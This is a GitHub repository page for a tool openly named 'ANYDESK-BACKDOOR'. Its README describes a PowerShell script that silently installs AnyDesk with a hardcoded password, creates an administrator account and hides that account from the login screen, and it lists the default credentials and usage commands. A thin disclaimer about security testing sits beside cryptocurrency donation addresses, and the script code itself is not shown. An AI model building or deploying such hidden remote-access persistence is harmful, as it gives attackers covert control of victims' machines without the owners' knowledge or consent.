Skip to content

You should never use malware to infiltrate a target system. With the skill of writing and exploiting technical codes, you can do the best ways of penetration. This is done in order to test and increase the security of the open sourcecode.

AiGptCode/ANYDESK-BACKDOOR

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 
 
 

Repository files navigation

You should never use malware to infiltrate a target system. With the skill of writing and exploiting technical codes, you can do the best ways of penetration. This is done in order to test and increase the security of the open sourcecode.

python and powershell version

# AnyDesk Installation and Configuration Script

This PowerShell script automates the installation and initial configuration of the AnyDesk remote desktop application on Windows systems. It also creates a new user account with administrative privileges for AnyDesk access. This README provides an overview of the script and instructions for usage.

## Features

- Downloads and installs AnyDesk silently.
- Sets a password for AnyDesk for added security.
- Creates a new user account with administrative privileges.
- Hides the new user account from the Windows login screen.
- Retrieves the AnyDesk ID for future reference.

## Requirements

- Windows operating system.
- PowerShell 5.1 or later.
- Internet access to download AnyDesk.

## Usage

1. Clone or download this repository to your Windows machine.

2. Open PowerShell with administrator privileges.

3. Navigate to the directory where the script is located.

4. Run the script by executing the following command:
   ```powershell
   .\Hydra-AnyDesk.ps1
  1. Follow the prompts to customize the installation path, AnyDesk URL, passwords, and usernames (optional).

  2. The script will install AnyDesk and perform the necessary configuration tasks.

Customization

The script can be customized using the following parameters when running it:

  • -InstallPath: Specify the installation path for AnyDesk. Default is "C:\ProgramData\AnyDesk".
  • -AnyDeskUrl: Specify the URL to download AnyDesk. Default is "http://download.anydesk.com/AnyDesk.exe".
  • -Password: Set the AnyDesk password. Default is "J9kzQ2Y0qO".
  • -AdminUsername: Set the username for the new administrator account. Default is "oldadministrator".
  • -AdminPassword: Set the password for the new administrator account. Default is "jsbehsid#Zyw4E3".

Example:

.\Install-AnyDesk.ps1 -InstallPath "C:\CustomPath" -AdminUsername "myadmin" -AdminPassword "mypassword"

Error Handling

The script includes error handling to gracefully handle failures during installation. Any errors encountered will be displayed, and the installation status will be reported.

Security Considerations

  • Be cautious when automating administrative tasks and ensure that you understand the implications of creating new user accounts with administrative privileges.
  • Always use strong, unique passwords for security.
  • Prompt for sensitive information instead of hardcoding it for better security.

Contributing

If you have suggestions, bug reports, or feature requests, feel free to open an issue or create a pull request on this GitHub repository.

License

This script is released under the MIT License.


Donate if you ... :)

0xc177e861fD9a9F598236C7183e105b9CCec9cb3e
bc1q3230gkphdk5qzsxtj079mz5w35svwrpwq6wh8c

This README provides clear instructions on using your script, customizing its behavior, handling errors, and includes important security considerations. Users can refer to it to understand how your script works and how to use it effectively.

About

You should never use malware to infiltrate a target system. With the skill of writing and exploiting technical codes, you can do the best ways of penetration. This is done in order to test and increase the security of the open sourcecode.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published